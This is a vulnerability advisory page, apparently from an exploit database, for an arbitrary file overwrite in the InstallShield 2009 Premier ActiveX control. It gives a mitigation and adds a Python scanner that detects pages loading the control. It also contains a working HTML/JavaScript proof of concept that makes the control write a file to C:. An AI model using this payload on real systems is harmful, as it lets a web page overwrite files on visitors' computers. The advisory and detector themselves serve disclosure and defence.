Vendor: InstallShield 2009 Premier
By: the_Edit0r
CVSS: 7.5 (HIGH)
Arbitrary File Overwrite
CWE: 264
Product Name: InstallShield 2009 Premier
Affected Version From: 15.0.0.53
Affected Version To: 15.0.0.53
Patch Exists: Yes
Related CWE: N/A
CPE: a:flexerasoftware:installshield_2009_premier
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

InstallShield 2009 Premier ActiveX Control Arbitrary File Overwrite Vulnerability

InstallShield 2009 Premier ActiveX control is prone to an arbitrary-file-overwrite vulnerability. Attackers can overwrite arbitrary files on the victim's computer in the context of the vulnerable application (typically Internet Explorer) using the ActiveX control. InstallShield 2009 Premier 15.0.0.53 is vulnerable; other versions may also be affected.

Mitigation:

Update to the latest version of InstallShield 2009 Premier.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/43857/info

# Part Expl0it & Bug Codes ( Poc ) :
------------------------------------
<b> Installshiled 2009 premier 15.0.0.53 File Overwrite Expl0it <b/>
by : the_Edit0r <b/> <b/>
<object classid='clsid:34E7A6F9-F260-46BD-AAC8-1E70E22139D2' id='Edit0r'></object>
<script>
try{
  var obj = document.InsertCustomAction('Edit0r');
  obj.AddPage(1);
  obj.SaveToFile("C:/system_.ini");
  window.alert('check C:');
} catch(err){
  window.alert('Poc failed');
}
</script>
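
For detection, pages that load this control can be flagged by the class ID that appears in the PoC. The following Python scanner is an added example, not part of the original advisory or the Exploit-DB entry: it finds `<object>` tags bound to that CLSID and reports whether inline script also calls `SaveToFile`. The names `ControlFinder`, `scan_html` and `SAMPLE`, and the sample markup itself, are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID taken from the PoC on this page; all other names here are illustrative.
TARGET_CLSID = "34e7a6f9-f260-46bd-aac8-1e70e22139d2"
# Method the PoC calls to write the file; whitespace-tolerant match.
SAVE_CALL = re.compile(r"\.\s*SaveToFile\s*\(", re.IGNORECASE)

# Constructed sample: mixed-case classid, braces, and spacing around the call.
SAMPLE = ('<object ID="ctl" CLASSID="CLSID:{34E7A6F9-F260-46bd-aac8-1e70e22139d2}">'
          '</object><script>ctl . SaveToFile (path);</script>')


class ControlFinder(HTMLParser):
    """Collects ids of <object> tags bound to TARGET_CLSID plus inline script text."""

    def __init__(self):
        super().__init__()
        self.object_ids, self.script_text, self.in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
        elif tag == "object":
            a = {k: (v or "") for k, v in attrs}
            classid = a.get("classid", "").strip().lower()
            # Accept "clsid:GUID" with or without braces, in any letter case.
            if classid.startswith("clsid:") and classid[6:].strip("{} ") == TARGET_CLSID:
                self.object_ids.append(a.get("id", ""))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.script_text.append(data)


def scan_html(html):
    """Return what one HTML document does with the control."""
    finder = ControlFinder()
    finder.feed(html)
    finder.close()
    found = bool(finder.object_ids)
    calls = found and bool(SAVE_CALL.search("\n".join(finder.script_text)))
    return {"instantiates_control": found, "object_ids": finder.object_ids,
            "calls_save_to_file": calls}


if __name__ == "__main__":
    print(scan_html(SAMPLE))
```

A match on the CLSID alone is worth triaging. Markup built at run time by script, or script loaded from an external file, is outside what this static check sees.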